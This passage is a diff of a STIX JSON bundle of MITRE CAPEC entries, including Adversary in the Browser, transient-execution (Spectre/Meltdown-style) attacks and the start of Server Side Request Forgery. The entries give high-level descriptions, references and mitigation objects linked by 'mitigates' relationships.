"https://capec.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Man in the Browser", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Man-in-the-browser attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Man-in-the-browser attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-629", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Liviu Arsene, Oil and Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal, 2020--04---21, Bitdefender Labs", + "external_id": "REF-630", + "source_name": "reference_from_CAPEC", + "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/" + }, + { + "description": "Amit Klein, Man-in-the-Mobile Attacks Single Out Android, 2012--07---10, SecurityIntelligence", + "external_id": "REF-631", + "source_name": "reference_from_CAPEC", + "url": "https://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/" + }, + { + "description": "Kelly Jackson Higgins, New 'Boy In The Browser' Attacks On The Rise, 2011--02---14, Dark Reading, Informa PLC", + "external_id": "REF-632", + "source_name": "reference_from_CAPEC", + "url": "https://www.darkreading.com/risk/new-boy-in-the-browser-attacks-on-the-rise/d/d-id/1135247" + } + ], + "id": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Adversary in the Browser (AiTB)", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Man in the Browser", + "Boy in the Browser", + "Man in the Mobile" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a", + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary.\n ", + "\n In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. 
The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]\n ", + "\n Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim's \"hosts\" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]\n ", + "\n Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. The adversary tricks the victim into installing the Trojan Horse malware onto their system.

  2. Techniques
    Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate.
  3. The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

Exploit

  1. The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

", + "x_capec_extended_description": "\n This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must install or convince a user to install a Trojan.", + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.", + "For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack." + ], + "x_capec_skills_required": { + "Medium": "Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.", + "id": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17c99f05-562d-4662-b800-5617b6dc75c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-malware tools, which can detect Trojan Horse malware.", + "id": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a77f1a6-7693-45ea-96fd-c6e1510943e8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7656220c-0e2c-4110-8dbf-66fc149793c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit user permissions to prevent browser pivoting.", + "id": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure browser sessions are regularly terminated and when their effective lifetime ends.", + "id": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67a5c853-3f88-42c9-836f-4737587b3cb1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. 
Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + "external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and Defenses, 2019--05---15, Graz University of Technology", + 
"external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection 
Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

  2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.
  3. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

  4. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

  3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

  2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don't share resources", + "id": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ff9f578-79d5-4352-a475-1b33b37b07a7", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables", + "id": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbff3867-2c77-46ca-911a-4348a280a4bb", + "modified": "2022-02-22T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution", + "id": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e424f3f2-c61b-4d4a-9e40-eef4438e644d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable SharedArrayBuffer for Web Browsers", + "id": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--183b50f2-3b70-46cf-94a6-bfa6c657652d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cba702aa-e3c0-4659-b0a4-5884aa8b6ed5", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Copy-on-Write between Cloud VMs", + "id": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e9cc3819-f8ef-4590-96ab-5d9ddb6a9bb6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d4954d97-b73a-4bed-952e-83b9a609fc81", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Privilege Checks on Cache Flush Instructions", + "id": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { 
+ "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224b0c6b-54cf-408c-9215-be2bc2bb613b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a18a858a-e419-47d9-92aa-3db4c41c67fe", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks", + "id": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cbb16a5-1749-47ba-8527-a912d9298189", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6acfbc2d-97e0-447f-a683-2eebc9157e84", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or 
to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.\n ", + "external_references": [ + { + "external_id": "CAPEC-664", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-918", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/918.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "OWASP SSRF Bible, 2017--01---26, OWASP", + "external_id": "REF-644", + "source_name": "reference_from_CAPEC", + "url": "https://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf" + }, + { + "description": "Server Side Request Forgery, PortSwigger", + "external_id": "REF-645", + "source_name": "reference_from_CAPEC", + "url": "https://portswigger.net/web-security/ssrf" + }, + { + "description": "CallStranger Vulnerability, 2020--06---08, Yunus Cadirici", + "external_id": "REF-646", + "source_name": "reference_from_CAPEC", + "url": "https://github.com/yunuscadirci/CallStranger" + } + ], + "id": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Server Side Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + 
